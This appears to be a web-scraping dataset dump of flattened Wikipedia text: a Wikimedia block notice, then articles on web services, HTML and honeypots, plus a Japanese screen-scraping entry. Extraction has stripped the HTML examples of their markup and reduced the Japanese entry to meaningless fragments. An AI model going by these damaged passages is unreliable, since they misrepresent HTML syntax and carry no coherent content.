for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
420 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_service | A web service (WS) is either: In a web service, a web technology such as HTTP is used for transferring machine-readable file formats such as XML and JSON. In practice, a web service commonly provides an object-oriented web-based interface to a database server, utilized for example by another web server, or by a mobile app, that provides a user interface to the end-user. Many organizations that provide data in formatted HTML pages will also provide that data on their server as XML or JSON, often through a Web service to allow syndication. Another application offered to the end-user may be a mashup, where a Web server consumes several Web services at different machines and compiles the content into one user interface. Asynchronous JavaScript And XML (AJAX) is a dominant technology for Web services. Developing from the combination of HTTP servers, JavaScript clients and Plain Old XML (as distinct from SOAP and W3C Web Services), now it is frequently used with JSON as well as, or instead of, XML. Representational State Transfer (REST) is an architecture for well-behaved Web services that can function at Internet scale. In a 2004 document, the W3C sets following REST as a key distinguishing feature of Web services: We can identify two major classes of Web services: There are a number of Web services that use markup languages: A Web API is a development in Web services where emphasis has been moving to simpler representational state transfer (REST) based communications. 2 Restful APIs do not require XML-based Web service protocols (SOAP and WSDL) to support their interfaces. In relation to W3C Web services, the W3C defined a Web service as: A web service is a software system designed to support interoperable machine-to-machine interaction over a network. It has an interface described in a machine-processable format (specifically WSDL). Other systems interact with the web service in a manner prescribed by its description using SOAP-messages, typically conveyed using HTTP with an XML serialization in conjunction with other web-related standards. W3C Web Services may use SOAP over HTTP protocol, allowing less costly (more efficient) interactions over the Internet than via proprietary solutions like EDI B2B. Besides SOAP over HTTP, Web services can also be implemented on other reliable transport mechanisms like FTP. In a 2002 document, the Web Services Architecture Working Group defined a Web services architecture, requiring a standardized implementation of a "Web service. The term "Web service" describes a standardized way of integrating Web-based applications using the XML, SOAP, WSDL and UDDI open standards over an Internet Protocol backbone. XML is the data format used to contain the data and provide metadata around it, SOAP is used to transfer the data, WSDL is used for describing the services available and UDDI lists what services are available. A Web service is a method of communication between two electronic devices over a network. It is a software function provided at a network address over the Web with the service always-on as in the concept of utility computing. Many organizations use multiple software systems for management. citation needed Different software systems often need to exchange data with each other, and a Web service is a method of communication that allows two software systems to exchange this data over the Internet. The software system that requests data is called a service requester, whereas the software system that would process the request and provide the data is called a service provider. Different software may use different programming languages, and hence there is a need for a method of data exchange that doesn't depend upon a particular programming language. Most types of software can, however, interpret XML tags. Thus, Web services can use XML files for data exchange. Rules for communication with different systems need to be defined, such as: All of these rules for communication are defined in a file called WSDL (Web Services Description Language), which has a .wsdl extension. (Proposals for Autonomous Web Services (AWS) seek to develop more flexible Web services that do not rely on strict rules. a ) A directory called UDDI (Universal Description, Discovery, and Integration) defines which software system should be contacted for which type of data. So when one software system needs one particular report data, it would go to the UDDI and find out which other systems it can contact for receiving that data. Once the software system finds out which other systems it should contact, it would then contact that system using a special protocol called SOAP (Simple Object Access Protocol). The service provider system would first validate the data request by referring to the WSDL file, and then process the request and send the data under the SOAP protocol. Automated tools can aid in the creation of a Web service. For services using WSDL, it is possible to either automatically generate WSDL for existing classes (a bottom-up model) or to generate a class skeleton given existing WSDL (a top-down model). Critics of non-RESTful Web services often complain that they are too complex 8 and based upon large software vendors or integrators, rather than typical open source implementations. There are also concerns about performance due to Web services' use of XML as a message format and SOAP HTTP in enveloping and transporting. 9 Functional and non-functional testing of Web services is done with the help of WSDL parsing. Regression testing is performed by identifying the changes made to upgrade software. Web service regression testing needs can be categorized in three different ways, namely, changes in WSDL, changes in the code, and selective re-testing of operations. We can capture the above three needs in three intermediate forms of Subset WSDL, 7 namely, Difference WSDL (DWSDL), Unit WSDL (UWSDL), and Reduced WSDL (RWSDL), respectively. These three Subset WSDLs are then combined to form Combined WSDL (CWSDL) that is further used for regression testing of the Web service. This will help in Automated Web Service Change Management (AWSCM), 10 by performing the selection of the relevant test cases to construct a reduced test suite from the old test suite. 11 Web services testing can also be automated using several test automation tools like SoapUI, Oracle Application Testing Suite (OATS), 12 13 Unified Functional Testing, Selenium, etc. Work-related to the capture and visualization of changes made to a Web service. Visualization and computation of changes can be done in the form of intermediate artifacts (Subset WSDL). 7 The insight on the computation of change impact is helpful in testing, top-down development and reduce regression testing. AWSCM 10 is a tool that can identify subset operations in a WSDL file to construct a subset WSDL. While UDDI was intended to serve as a service directory and become the means to discovering web services, many vendors discontinued their UDDI solutions or repositories between 2005 2008, including Microsoft, SAP, IBM, among others. 14 15 A key study published in WWW2008 Conference (Beijing, China) 16 presented the state of SOAP-based web services and concluded that only 63% of the available SOAP-based web services at the time of the study were actually active or can be invoked. The study also found that search engines were becoming an ideal source for searching for web services compared to that of service registries like the UDDI due its design complexity. 17 |
421 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/HTML | Hypertext Markup Language (HTML) is the standard markup language for documents designed to be displayed in a web browser. It defines the content and structure of web content. It is often assisted by technologies such as Cascading Style Sheets (CSS) and scripting languages such as JavaScript. Web browsers receive HTML documents from a web server or from local storage and render the documents into multimedia web pages. HTML describes the structure of a web page semantically and originally included cues for its appearance. HTML elements are the building blocks of HTML pages. With HTML constructs, images and other objects such as interactive forms may be embedded into the rendered page. HTML provides a means to create structured documents by denoting structural semantics for text such as headings, paragraphs, lists, links, quotes, and other items. HTML elements are delineated by tags, written using angle brackets. Tags such as img and input directly introduce content into the page. Other tags such as p and p surround and provide information about document text and may include sub-element tags. Browsers do not display the HTML tags but use them to interpret the content of the page. HTML can embed programs written in a scripting language such as JavaScript, which affects the behavior and content of web pages. The inclusion of CSS defines the look and layout of content. The World Wide Web Consortium (W3C), former maintainer of the HTML and current maintainer of the CSS standards, has encouraged the use of CSS over explicit presentational HTML since 1997. update 2 A form of HTML, known as HTML5, is used to display video and audio, primarily using the canvas element, together with JavaScript. In 1980, physicist Tim Berners-Lee, a contractor at CERN, proposed and prototyped ENQUIRE, a system for CERN researchers to use and share documents. In 1989, Berners-Lee wrote a memo proposing an Internet-based hypertext system. 3 Berners-Lee specified HTML and wrote the browser and server software in late 1990. That year, Berners-Lee and CERN data systems engineer Robert Cailliau collaborated on a joint request for funding, but the project was not formally adopted by CERN. In his personal notes of 1990, Berners-Lee listed "some of the many areas in which hypertext is used"; an encyclopedia is the first entry. 4 The first publicly available description of HTML was a document called "HTML Tags", 5 first mentioned on the Internet by Tim Berners-Lee in late 1991. 6 7 It describes 18 elements comprising the initial, relatively simple design of HTML. Except for the hyperlink tag, these were strongly influenced by SGMLguid, an in-house Standard Generalized Markup Language (SGML) based documentation format at CERN. Eleven of these elements still exist in HTML 4. 8 HTML is a markup language that web browsers use to interpret and compose text, images, and other material into visible or audible web pages. Default characteristics for every item of HTML markup are defined in the browser, and these characteristics can be altered or enhanced by the web page designer's additional use of CSS. Many of the text elements are mentioned in the 1988 ISO technical report TR 9537 Techniques for using SGML, which describes the features of early text formatting languages such as that used by the RUNOFF command developed in the early 1960s for the CTSS (Compatible Time-Sharing System) operating system. These formatting commands were derived from the commands used by typesetters to manually format documents. However, the SGML concept of generalized markup is based on elements (nested annotated ranges with attributes) rather than merely print effects, with separate structure and markup. HTML has been progressively moved in this direction with CSS. Berners-Lee considered HTML to be an application of SGML. It was formally defined as such by the Internet Engineering Task Force (IETF) with the mid 1993 publication of the first proposal for an HTML specification, the "Hypertext Markup Language (HTML) Internet Draft by Berners-Lee and Dan Connolly, which included an SGML Document type definition to define the syntax. 9 10 The draft expired after six months, but was notable for its acknowledgment of the NCSA Mosaic browser's custom tag for embedding in-line images, reflecting the IETF's philosophy of basing standards on successful prototypes. Similarly, Dave Raggett's competing Internet Draft, "HTML (Hypertext Markup Format) , from late 1993, suggested standardizing already-implemented features like tables and fill-out forms. 11 After the HTML and HTML drafts expired in early 1994, the IETF created an HTML Working Group. In 1995, this working group completed "HTML 2.0", the first HTML specification intended to be treated as a standard against which future implementations should be based. 12 Further development under the auspices of the IETF was stalled by competing interests. Since 1996, update the HTML specifications have been maintained, with input from commercial software vendors, by the World Wide Web Consortium (W3C). 13 In 2000, HTML became an international standard (ISO IEC 15445:2000). HTML 4.01 was published in late 1999, with further errata published through 2001. In 2004, development began on HTML5 in the Web Hypertext Application Technology Working Group (WHATWG), which became a joint deliverable with the W3C in 2008, and was completed and standardized on 28 October 2014. 14 XHTML is a separate language that began as a reformulation of HTML 4.01 using XML 1.0. It is now referred to as the XML syntax for HTML and is no longer being developed as a separate standard. 58 On 28 May 2019, the W3C announced that WHATWG would be the sole publisher of the HTML and DOM standards. 65 66 67 68 The W3C and WHATWG had been publishing competing standards since 2012. While the W3C standard was identical to the WHATWG in 2007 the standards have since progressively diverged due to different design decisions. 69 The WHATWG "Living Standard" had been the de facto web standard for some time. 70 HTML markup consists of several key components, including those called tags (and their attributes), character-based data types, character references and entity references. HTML tags most commonly come in pairs like h1 and h1 , although some represent empty elements and so are unpaired, for example img . The first tag in such a pair is the start tag, and the second is the end tag (they are also called opening tags and closing tags). Another important component is the HTML document type declaration, which triggers standards mode rendering. The following is an example of the classic "Hello, World program: The text between html and html describes the web page, and the text between body and body is the visible page content. The markup text title This is a title title defines the browser page title shown on browser tabs and window titles and the tag div defines a division of the page used for easy styling. Between head and head , a meta element can be used to define webpage metadata. The Document Type Declaration DOCTYPE html is for HTML5. If a declaration is not included, various browsers will revert to "quirks mode" for rendering. 71 HTML documents imply a structure of nested HTML elements. These are indicated in the document by HTML tags, enclosed in angle brackets thus: p . 72 better source needed In the simple, general case, the extent of an element is indicated by a pair of tags: a "start tag" p and "end tag" p . The text content of the element, if any, is placed between these tags. Tags may also enclose further tag markup between the start and end, including a mixture of tags and text. This indicates further (nested) elements, as children of the parent element. The start tag may also include the element's attributes within the tag. These indicate other information, such as identifiers for sections within the document, identifiers used to bind style information to the presentation of the document, and for some tags such as the img used to embed images, the reference to the image resource in the format like this: img src "example.com example.jpg" Some elements, such as the line break br do not permit any embedded content, either text or further tags. These require only a single empty tag (akin to a start tag) and do not use an end tag. Many tags, particularly the closing end tag for the very commonly used paragraph element p , are optional. An HTML browser or other agent can infer the closure for the end of an element from the context and the structural rules defined by the HTML standard. These rules are complex and not widely understood by most HTML authors. The general form of an HTML element is therefore: tag attribute1 "value1" attribute2 "value2" 'content' tag . Some HTML elements are defined as empty elements and take the form tag attribute1 "value1" attribute2 "value2" . Empty elements may enclose no content, for instance, the br tag or the inline img tag. The name of an HTML element is the name used in the tags. The end tag's name is preceded by a slash character, , and that in empty elements the end tag is neither required nor allowed. If attributes are not mentioned, default values are used in each case. Header of the HTML document: head ... head . The title is included in the head, for example: HTML headings are defined with the h1 to h6 tags with H1 being the highest (or most important) level and H6 the least: The effects are: CSS can substantially change the rendering. Paragraphs: br . The difference between br and p is that br breaks a line without altering the semantic structure of the page, whereas p sections the page into paragraphs. The element br is an empty element in that, although it may have attributes, it can take no content and it may not have an end tag. This is a link in HTML. To create a link the a tag is used. The href attribute holds the URL address of the link. There are many possible ways a user can give input s like: Comments: Comments can help in the understanding of the markup and do not display in the webpage. There are several types of markup elements used in HTML: Most of the attributes of an element are name value pairs, separated by and written within the start tag of an element after the element's name. The value may be enclosed in single or double quotes, although values consisting of certain characters can be left unquoted in HTML (but not XHTML). 74 75 Leaving attribute values unquoted is considered unsafe. 76 In contrast with name-value pair attributes, there are some attributes that affect the element simply by their presence in the start tag of the element, 6 like the ismap attribute for the img element. 77 There are several common attributes that may appear in many elements : The abbreviation element, abbr, can be used to demonstrate some of these attributes: This example displays as HTML; in most browsers, pointing the cursor at the abbreviation should display the title text "Hypertext Markup Language. Most elements take the language-related attribute dir to specify text direction, such as with "rtl" for right-to-left text in, for example, Arabic, Persian or Hebrew. 78 As of version 4.0, HTML defines a set of 252 character entity references and a set of 1,114,050 numeric character references, both of which allow individual characters to be written via simple markup, rather than literally. A literal character and its markup counterpart are considered equivalent and are rendered identically. The ability to "escape" characters in this way allows for the characters and (when written as lt; and amp;, respectively) to be interpreted as character data, rather than markup. For example, a literal normally indicates the start of a tag, and normally indicates the start of a character entity reference or numeric character reference; writing it as amp; or x26; or 38; allows to be included in the content of an element or in the value of an attribute. The double-quote character ( ), when not used to quote an attribute value, must also be escaped as quot; or x22; or 34; when it appears within the attribute value itself. Equivalently, the single-quote character ( ), when not used to quote an attribute value, must also be escaped as x27; or 39; (or as apos; in HTML5 or XHTML documents 79 80 ) when it appears within the attribute value itself. If document authors overlook the need to escape such characters, some browsers can be very forgiving and try to use context to guess their intent. The result is still invalid markup, which makes the document less accessible to other browsers and to other user agents that may try to parse the document for search and indexing purposes for example. Escaping also allows for characters that are not easily typed, or that are not available in the document's character encoding, to be represented within the element and attribute content. For example, the acute-accented e ( ), a character typically found only on Western European and South American keyboards, can be written in any HTML document as the entity reference eacute; or as the numeric references xE9; or 233;, using characters that are available on all keyboards and are supported in all character encodings. Unicode character encodings such as UTF 8 are compatible with all modern browsers and allow direct access to almost all the characters of the world's writing systems. 81 HTML defines several data types for element content, such as script data and stylesheet data, and a plethora of types for attribute values, including IDs, names, URIs, numbers, units of length, languages, media descriptors, colors, character encodings, dates and times, and so on. All of these data types are specializations of character data. HTML documents are required to start with a Document type declaration (informally, a "doctype"). In browsers, the doctype helps to define the rendering mode—particularly whether to use quirks mode. The original purpose of the doctype was to enable the parsing and validation of HTML documents by SGML tools based on the Document type definition (DTD). The DTD to which the DOCTYPE refers contains a machine-readable grammar specifying the permitted and prohibited content for a document conforming to such a DTD. Browsers, on the other hand, do not implement HTML as an application of SGML and as consequence do not read the DTD. HTML5 does not define a DTD; therefore, in HTML5 the doctype declaration is simpler and shorter: 82 An example of an HTML 4 doctype This declaration references the DTD for the "strict" version of HTML 4.01. SGML-based validators read the DTD in order to properly parse the document and to perform validation. In modern browsers, a valid doctype activates standards mode as opposed to quirks mode. In addition, HTML 4.01 provides Transitional and Frameset DTDs, as explained below. The transitional type is the most inclusive, incorporating current tags as well as older or "deprecated" tags, with the Strict DTD excluding deprecated tags. The frameset has all tags necessary to make frames on a page along with the tags included in transitional type. 83 Semantic HTML is a way of writing HTML that emphasizes the meaning of the encoded information over its presentation (look). HTML has included semantic markup from its inception, 84 but has also included presentational markup, such as font , i and center tags. There are also the semantically neutral div and span tags. Since the late 1990s, when Cascading Style Sheets were beginning to work in most browsers, web authors have been encouraged to avoid the use of presentational HTML markup with a view to the separation of content and presentation. 85 In a 2001 discussion of the Semantic Web, Tim Berners-Lee and others gave examples of ways in which intelligent software "agents" may one day automatically crawl the web and find, filter, and correlate previously unrelated, published facts for the benefit of human users. 86 Such agents are not commonplace even now, but some of the ideas of Web 2.0, mashups and price comparison websites may be coming close. The main difference between these web application hybrids and Berners-Lee's semantic agents lies in the fact that the current aggregation and hybridization of information is usually designed by web developers, who already know the web locations and the API semantics of the specific data they wish to mash, compare and combine. An important type of web agent that does crawl and read web pages automatically, without prior knowledge of what it might find, is the web crawler or search-engine spider. These software agents are dependent on the semantic clarity of web pages they find as they use various techniques and algorithms to read and index millions of web pages a day and provide web users with search facilities without which the World Wide Web's usefulness would be greatly reduced. In order for search engine spiders to be able to rate the significance of pieces of text they find in HTML documents, and also for those creating mashups and other hybrids as well as for more automated agents as they are developed, the semantic structures that exist in HTML need to be widely and uniformly applied to bring out the meaning of the published text. 87 Presentational markup tags are deprecated in current HTML and XHTML recommendations. The majority of presentational features from previous versions of HTML are no longer allowed as they lead to poorer accessibility, higher cost of site maintenance, and larger document sizes. 88 Good semantic HTML also improves the accessibility of web documents (see also Web Content Accessibility Guidelines). For example, when a screen reader or audio browser can correctly ascertain the structure of a document, it will not waste the visually impaired user's time by reading out repeated or irrelevant information when it has been marked up correctly. HTML documents can be delivered by the same means as any other computer file. However, they are most often delivered either by HTTP from a web server or by email. The World Wide Web is composed primarily of HTML documents transmitted from web servers to web browsers using the Hypertext Transfer Protocol (HTTP). However, HTTP is used to serve images, sound, and other content, in addition to HTML. To allow the web browser to know how to handle each document it receives, other information is transmitted along with the document. This meta data usually includes the MIME type (e.g., text html or application xhtml xml) and the character encoding (see Character encodings in HTML). In modern browsers, the MIME type that is sent with the HTML document may affect how the document is initially interpreted. A document sent with the XHTML MIME type is expected to be well-formed XML; syntax errors may cause the browser to fail to render it. The same document sent with the HTML MIME type might be displayed successfully since some browsers are more lenient with HTML. The W3C recommendations state that XHTML 1.0 documents that follow guidelines set forth in the recommendation's Appendix C may be labeled with either MIME Type. 89 XHTML 1.1 also states that XHTML 1.1 documents should 90 be labeled with either MIME type. 91 Most graphical email clients allow the use of a subset of HTML (often ill-defined) to provide formatting and semantic markup not available with plain text. This may include typographic information like colored headings, emphasized and quoted text, inline images and diagrams. Many such clients include both a GUI editor for composing HTML e-mail messages and a rendering engine for displaying them. Use of HTML in e-mail is criticized by some because of compatibility issues, because it can help disguise phishing attacks, because of accessibility issues for blind or visually impaired people, because it can confuse spam filters and because the message size is larger than plain text. The most common filename extension for files containing HTML is .html. A common abbreviation of this is .htm, which originated because some early operating systems and file systems, such as DOS and the limitations imposed by FAT data structure, limited file extensions to three letters. 92 An HTML Application (HTA; file extension .hta) is a Microsoft Windows application that uses HTML and Dynamic HTML in a browser to provide the application's graphical interface. A regular HTML file is confined to the security model of the web browser's security, communicating only to web servers and manipulating only web page objects and site cookies. An HTA runs as a fully trusted application and therefore has more privileges, like creation editing removal of files and Windows Registry entries. Because they operate outside the browser's security model, HTAs cannot be executed via HTTP, but must be downloaded (just like an EXE file) and executed from local file system. Since its inception, HTML and its associated protocols gained acceptance relatively quickly. However, no clear standards existed in the early years of the language. Though its creators originally conceived of HTML as a semantic language devoid of presentation details, 93 practical uses pushed many presentational elements and attributes into the language, driven largely by the various browser vendors. The latest standards surrounding HTML reflect efforts to overcome the sometimes chaotic development of the language 94 and to create a rational foundation for building both meaningful and well-presented documents. To return HTML to its role as a semantic language, the W3C has developed style languages such as CSS and XSL to shoulder the burden of presentation. In conjunction, the HTML specification has slowly reined in the presentational elements. There are two axes differentiating various variations of HTML as currently specified: SGML-based HTML versus XML-based HTML (referred to as XHTML) on one axis, and strict versus transitional (loose) versus frameset on the other axis. One difference in the latest when? HTML specifications lies in the distinction between the SGML-based specification and the XML-based specification. The XML-based specification is usually called XHTML to distinguish it clearly from the more traditional definition. However, the root element name continues to be "html" even in the XHTML-specified HTML. The W3C intended XHTML 1.0 to be identical to HTML 4.01 except where limitations of XML over the more complex SGML require workarounds. Because XHTML and HTML are closely related, they are sometimes documented in parallel. In such circumstances, some authors conflate the two names as (X)HTML or X(HTML). Like HTML 4.01, XHTML 1.0 has three sub-specifications: strict, transitional, and frameset. Aside from the different opening declarations for a document, the differences between an HTML 4.01 and XHTML 1.0 document—in each of the corresponding DTDs—are largely syntactic. The underlying syntax of HTML allows many shortcuts that XHTML does not, such as elements with optional opening or closing tags, and even empty elements which must not have an end tag. By contrast, XHTML requires all elements to have an opening tag and a closing tag. XHTML, however, also introduces a new shortcut: an XHTML tag may be opened and closed within the same tag, by including a slash before the end of the tag like this: br . The introduction of this shorthand, which is not used in the SGML declaration for HTML 4.01, may confuse earlier software unfamiliar with this new convention. A fix for this is to include a space before closing the tag, as such: br . 95 To understand the subtle differences between HTML and XHTML, consider the transformation of a valid and well-formed XHTML 1.0 document that adheres to Appendix C (see below) into a valid HTML 4.01 document. Making this translation requires the following steps: Those are the main changes necessary to translate a document from XHTML 1.0 to HTML 4.01. To translate from HTML to XHTML would also require the addition of any omitted opening or closing tags. Whether coding in HTML or XHTML it may just be best to always include the optional tags within an HTML document rather than remembering which tags can be omitted. A well-formed XHTML document adheres to all the syntax requirements of XML. A valid document adheres to the content specification for XHTML, which describes the document structure. The W3C recommends several conventions to ensure an easy migration between HTML and XHTML (see HTML Compatibility Guidelines). The following steps can be applied to XHTML 1.0 documents only: By carefully following the W3C's compatibility guidelines, a user agent should be able to interpret the document equally as HTML or XHTML. For documents that are XHTML 1.0 and have been made compatible in this way, the W3C permits them to be served either as HTML (with a text html MIME type), or as XHTML (with an application xhtml xml or application xml MIME type). When delivered as XHTML, browsers should use an XML parser, which adheres strictly to the XML specifications for parsing the document's contents. HTML 4 defined three different versions of the language: Strict, Transitional (once called Loose), and Frameset. The Strict version is intended for new documents and is considered best practice, while the Transitional and Frameset versions were developed to make it easier to transition documents that conformed to older HTML specifications or did not conform to any specification to a version of HTML 4. The Transitional and Frameset versions allow for presentational markup, which is omitted in the Strict version. Instead, cascading style sheets are encouraged to improve the presentation of HTML documents. Because XHTML 1 only defines an XML syntax for the language defined by HTML 4, the same differences apply to XHTML 1 as well. The Transitional version allows the following parts of the vocabulary, which are not included in the Strict version: The Frameset version includes everything in the Transitional version, as well as the frameset element (used instead of body) and the frame element. In addition to the above transitional differences, the frameset specifications (whether XHTML 1.0 or HTML 4.01) specify a different content model, with frameset replacing body, that contains either frame elements, or optionally noframes with a body. As this list demonstrates, the loose versions of the specification are maintained for legacy support. However, contrary to popular misconceptions, the move to XHTML does not imply a removal of this legacy support. Rather the X in XML stands for extensible and the W3C is modularizing the entire specification and opens it up to independent extensions. The primary achievement in the move from XHTML 1.0 to XHTML 1.1 is the modularization of the entire specification. The strict version of HTML is deployed in XHTML 1.1 through a set of modular extensions to the base XHTML 1.1 specification. Likewise, someone looking for the loose (transitional) or frameset specifications will find similar extended XHTML 1.1 support (much of it is contained in the legacy or frame modules). Modularization also allows for separate features to develop on their own timetable. So for example, XHTML 1.1 will allow quicker migration to emerging XML standards such as MathML (a presentational and semantic math language based on XML) and XForms—a new highly advanced web-form technology to replace the existing HTML forms. In summary, the HTML 4 specification primarily reined in all the various HTML implementations into a single clearly written specification based on SGML. XHTML 1.0, ported this specification, as is, to the new XML-defined specification. Next, XHTML 1.1 takes advantage of the extensible nature of XML and modularizes the whole specification. XHTML 2.0 was intended to be the first step in adding new features to the specification in a standards-body-based approach. The HTML Living Standard, which is developed by WHATWG, is the official version, while W3C HTML5 is no longer separate from WHATWG. There are some WYSIWYG editors (what you see is what you get), in which the user lays out everything as it is to appear in the HTML document using a graphical user interface (GUI), often similar to word processors. The editor renders the document rather than showing the code, so authors do not require extensive knowledge of HTML. The WYSIWYG editing model has been criticized, 96 97 primarily because of the low quality of the generated code; there are voices who? advocating a change to the WYSIWYM model (what you see is what you mean). WYSIWYG editors remain a controversial topic because of their perceived flaws such as: |
422 | https://en.wikipedia.org/wiki/Data_scraping | https://ja.wikipedia.org/wiki/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B9%E3%82%AF%E3%83%AC%E3%82%A4%E3%83%94%E3%83%B3%E3%82%B0 | Screen scraping 2 1960 API 50 Telnet 1980 Quotron 24x80 page shredding Logicizer VAX VMS logicized 1 OCR GUI Web HTML XHTML Web Web API HTML PDF API |
423 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Honeypot_(computing) | In computer terminology, a honeypot is a computer security mechanism set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems. Generally, a honeypot consists of data (for example, in a network site) that appears to be a legitimate part of the site which contains information or resources of value to attackers. It is actually isolated, monitored, and capable of blocking or analyzing the attackers. This is similar to police sting operations, colloquially known as "baiting" a suspect. 1 The main use for this network decoy is to distract potential attackers from more important information and machines on the real network, learn about the forms of attacks they can suffer, and examine such attacks during and after the exploitation of a honeypot. It provides a way to prevent and see vulnerabilities in a specific network system. A honeypot is a decoy used to protect a network from present or future attacks. 2 3 Honeypots derive their value from the use by attackers. If not interacted with, the honeypot has little to no value. Honeypots can be used for everything from slowing down or stopping automated attacks, capturing new exploits, to gathering intelligence on emerging threats or early warning and prediction. 4 Honeypots can be differentiated based on if they are physical or virtual: 2 3 Honeypots can be classified based on their deployment (use action) and based on their level of involvement. Based on deployment, honeypots may be classified as: 5 Production honeypots are easy to use, capture only limited information, and are used primarily by corporations. Production honeypots are placed inside the production network with other production servers by an organization to improve their overall state of security. Normally, production honeypots are low-interaction honeypots, which are easier to deploy. They give less information about the attacks or attackers than research honeypots. 5 Research honeypots are run to gather information about the motives and tactics of the black hat community targeting different networks. These honeypots do not add direct value to a specific organization; instead, they are used to research the threats that organizations face and to learn how to better protect against those threats. 6 Research honeypots are complex to deploy and maintain, capture extensive information, and are used primarily by research, military, or government organizations. 7 Based on design criteria, honeypots can be classified as: 5 Pure honeypots are full-fledged production systems. The activities of the attacker are monitored by using a bug tap that has been installed on the honeypot's link to the network. No other software needs to be installed. Even though a pure honeypot is useful, stealthiness of the defense mechanisms can be ensured by a more controlled mechanism. High-interaction honeypots imitate the activities of the production systems that host a variety of services and, therefore, an attacker may be allowed a lot of services to waste their time. By employing virtual machines, multiple honeypots can be hosted on a single physical machine. Therefore, even if the honeypot is compromised, it can be restored more quickly. In general, high-interaction honeypots provide more security by being difficult to detect, but they are expensive to maintain. If virtual machines are not available, one physical computer must be maintained for each honeypot, which can be exorbitantly expensive. Example: Honeynet. Low-interaction honeypots simulate only the services frequently requested by attackers. 8 Since they consume relatively few resources, multiple virtual machines can easily be hosted on one physical system, the virtual systems have a short response time, and less code is required, reducing the complexity of the virtual system's security. Example: Honeyd. This type of honeypot was one of the first types being created in the late nineties and was mainly used for detecting attacks, not studying them. 9 Sugarcane is a type of honeypot that masquerades as an open proxy. 10 It can often take form as a server designed to look like a misconfigured HTTP proxy. 11 Probably the most famous open proxy was the default configuration of sendmail (before version 8.9.0 in 1998) which would forward email to and from any destination. 12 Recently, a new market segment called deception technology has emerged using basic honeypot technology with the addition of advanced automation for scale. Deception technology addresses the automated deployment of honeypot resources over a large commercial enterprise or government institution. 13 Malware honeypots are a decoy designed to intentionally attract malicious software. It does this by imitating a vulnerable system or network, such as a web server. The honeypot is intentionally set up with security flaws that look to invite these malware attacks. Once attacked IT teams can then analyze the malware to better understand where it comes from and how it acts. 14 Spammers abuse vulnerable resources such as open mail relays and open proxies. These are servers which accept e-mail from anyone on the Internet—including spammers—and send it to its destination. Some system administrators have created honeypot programs that masquerade as these abusable resources to discover spammer activity. There are several capabilities such honeypots provide to these administrators, and the existence of such fake abusable systems makes abuse more difficult or risky. Honeypots can be a powerful countermeasure to abuse from those who rely on very high volume abuse (e.g., spammers). These honeypots can reveal the abuser's IP address and provide bulk spam capture (which enables operators to determine spammers' URLs and response mechanisms). As described by M. Edwards at ITPRo Today: Typically, spammers test a mail server for open relaying by simply sending themselves an email message. If the spammer receives the email message, the mail server obviously allows open relaying. Honeypot operators, however, can use the relay test to thwart spammers. The honeypot catches the relay test email message, returns the test email message, and subsequently blocks all other email messages from that spammer. Spammers continue to use the antispam honeypot for spamming, but the spam is never delivered. Meanwhile, the honeypot operator can notify spammers' ISPs and have their Internet accounts canceled. If honeypot operators detect spammers who use open-proxy servers, they can also notify the proxy server operator to lock down the server to prevent further misuse. 15 The apparent source may be another abused system. Spammers and other abusers may use a chain of such abused systems to make detection of the original starting point of the abuse traffic difficult. This in itself is indicative of the power of honeypots as anti-spam tools. In the early days of anti-spam honeypots, spammers, with little concern for hiding their location, felt safe testing for vulnerabilities and sending spam directly from their own systems. Honeypots made the abuse riskier and more difficult. Spam still flows through open relays, but the volume is much smaller than in 2001 02. While most spam originates in the U.S., 16 spammers hop through open relays across political boundaries to mask their origin. Honeypot operators may use intercepted relay tests to recognize and thwart attempts to relay spam through their honeypots. "Thwart" may mean "accept the relay spam but decline to deliver it. Honeypot operators may discover other details concerning the spam and the spammer by examining the captured spam messages. Open-relay honeypots include Jackpot, written in Java by Jack Cleaver; smtpot.py, written in Python by Karl A. Krueger; 17 and spamhole, written in C. 18 The Bubblegum Proxypot is an open-source honeypot (or "proxypot"). 19 An email address that is not used for any other purpose than to receive spam can also be considered a spam honeypot. Compared with the term "spamtrap", the term "honeypot" might be more suitable for systems and techniques that are used to detect or counterattack probes. With a spamtrap, spam arrives at its destination "legitimately"—exactly as non-spam email would arrive. An amalgam of these techniques is Project Honey Pot, a distributed, open source project that uses honeypot pages installed on websites around the world. These honeypot pages disseminate uniquely tagged spamtrap email addresses and spammers can then be tracked—the corresponding spam mail is subsequently sent to these spamtrap e-mail addresses. 20 Databases often get attacked by intruders using SQL injection. As such activities are not recognized by basic firewalls, companies often use database firewalls for protection. Some of the available SQL database firewalls provide support honeypot architectures so that the intruder runs against a trap database while the web application remains functional. 21 Industrial Control Systems (ICS) are often the target of cyberattacks. 22 One of the main targets within ICS are Programmable Logic Controllers. 23 In order to understand intruders' techniques in this context, several honeypots has been proposed. Conpot 24 25 is a low interaction honeypot capable of simulation Siemens PLCs. HoneyPLC is a medium interaction honeypot that can simulate Siemens, Rockwell and other PLC brands. 26 27 Just as honeypots are weapons against spammers, honeypot detection systems are spammer-employed counter-weapons. As detection systems would likely use unique characteristics of specific honeypots to identify them, such as the property-value pairs of default honeypot configuration, 28 many honeypots in use utilise a set of unique characteristics larger and more daunting to those seeking to detect and thereby identify them. This is an unusual circumstance in software; a situation in which "versionitis" (a large number of versions of the same software, all differing slightly from each other) can be beneficial. There's also an advantage in having some easy-to-detect honeypots deployed. Fred Cohen, the inventor of the Deception Toolkit, argues that every system running his honeypot should have a deception port which adversaries can use to detect the honeypot. 29 Cohen believes that this might deter adversaries. Honeypots also allow for early detection of legitimate threats. No matter how the honeypot detects the exploit, it can alert you immediately to the attempted attack. 30 The goal of honeypots is to attract and engage attackers for a sufficiently long period to obtain high-level Indicators of Compromise (IoC) such as attack tools and Tactics, Techniques, and Procedures (TTPs). Thus, a honeypot needs to emulate essential services in the production network and grant the attacker the freedom to perform adversarial activities to increase its attractiveness to the attacker. Although the honeypot is a controlled environment and can 